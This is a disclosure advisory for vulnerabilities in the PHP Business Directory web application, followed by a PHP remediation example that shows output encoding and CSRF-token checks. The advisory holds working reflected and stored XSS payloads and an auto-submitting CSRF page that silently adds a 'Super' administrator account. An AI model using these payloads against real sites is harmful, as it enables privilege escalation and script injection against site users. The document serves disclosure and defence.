# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip

--------------------------------------------------------------------------------

POC as follows:

# 0x00 Reflected XSS
---

1. In the public search (no login required):

http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>

2. In the administration web interface (needs a normal user login):

http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>

# 0x01 Stored XSS
---

1. In the administration "directory" interface (needs a normal user login); every field of the new-business form is stored and later rendered unencoded:

http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>

2. In the administration "categories" interface (needs an administrator login); the category name is later printed inside a <select>, so the payload closes that element before the svg fires:

http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---

Hosted at http://192.168.1.103/csrf.html and opened by a logged-in administrator; the form auto-submits and the victim's session cookie is attached to the request:

<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

* Thanks to Besim *
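As an added example (not code from PHP Business Directory or from the advisory's author), the two server-side controls whose absence 0x00 through 0x02 demonstrate: context-aware HTML output encoding for every reflected or stored field, and a synchronizer-token check on the state-changing saveuser action. The function names, the session key csrf_token and the simplified form markup are assumptions for illustration; the payloads passed in at the bottom are the ones from the advisory.

```php
<?php
// Added example, not the vendor's code. Names below are illustrative.

// 1. Output encoding. Every value that is echoed into HTML (key, location,
//    businessname, categoryname, ...) is encoded for the HTML context.
//    ENT_QUOTES also encodes ' and ", so a value placed inside an attribute
//    cannot terminate the attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern (what 0x00 relies on): the search term is concatenated
// straight into the page, so <svg/onload=alert(1)> becomes live markup.
function render_search_vulnerable(string $key): string
{
    return '<input name="key" value="' . $key . '">';
}

// Hardened pattern: the same field, encoded. The browser shows the text of
// the payload and executes nothing.
function render_search(string $key): string
{
    return '<input name="key" value="' . h($key) . '">';
}

// The categoryname payload in 0x01 (2) works because the stored name is
// printed inside a <select>; "</select><svg/onload=alert(1)><select>" closes
// the element first. Encoding both the attribute and the option text defeats
// the breakout because "<" and ">" are emitted as &lt; and &gt;.
function render_category_option(string $name): string
{
    return '<option value="' . h($name) . '">' . h($name) . '</option>';
}

// 2. CSRF token. administration.php accepts pageaction=saveuser from any
//    origin that can get the victim's cookie attached (0x02). A per-session
//    random token, embedded in every state-changing form and compared in
//    constant time on submit, is the standard fix. session_start() must
//    already have run.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="' . h(csrf_token()) . '">';
}

function csrf_check(array $post): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals avoids a timing side channel on the comparison; the empty
    // check stops a request that carries no token at all from matching.
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// The check runs before any user row is written, so the forged form from
// 0x02 (which cannot know the victim's token) is rejected with 403.
function handle_saveuser(array $post): string
{
    if (!csrf_check($post)) {
        http_response_code(403);
        return 'Forbidden: missing or invalid CSRF token';
    }
    $username    = trim((string) ($post['username'] ?? ''));
    $accesslevel = (string) ($post['accesslevel'] ?? '');
    if ($username === '' || !in_array($accesslevel, ['Normal', 'Super'], true)) {
        return 'Rejected: invalid username or access level';
    }
    // ... insert the user row here (omitted: the vendor's schema is not on the page) ...
    return 'User ' . h($username) . ' saved with access level ' . h($accesslevel);
}

// Demonstration with the advisory's payloads.
session_start();
echo render_search_vulnerable('<svg/onload=alert(1)>'), "\n";            // live svg in a browser
echo render_search('<svg/onload=alert(1)>'), "\n";                       // inert &lt;svg ...&gt;
echo render_category_option('</select><svg/onload=alert(1)><select>'), "\n";
echo csrf_field(), "\n";                                                 // goes into the real saveuser form
echo handle_saveuser(['pageaction' => 'saveuser', 'username' => 'larry_csrf',
                      'accesslevel' => 'Super']), "\n";                  // 403: forged request has no token
echo handle_saveuser(['pageaction' => 'saveuser', 'username' => 'larry_csrf',
                      'accesslevel' => 'Super', 'csrf_token' => csrf_token()]), "\n"; // legitimate submit
```

Run it with `php example.php` to see the encoded and unencoded renderings side by side. The token check only closes the CSRF hole if every action that changes state (saveuser, savecategory, newsavebusiness, ...) goes through it; marking the session cookie SameSite=Lax is a worthwhile second layer but not a replacement, since the check must also hold for clients that ignore the attribute.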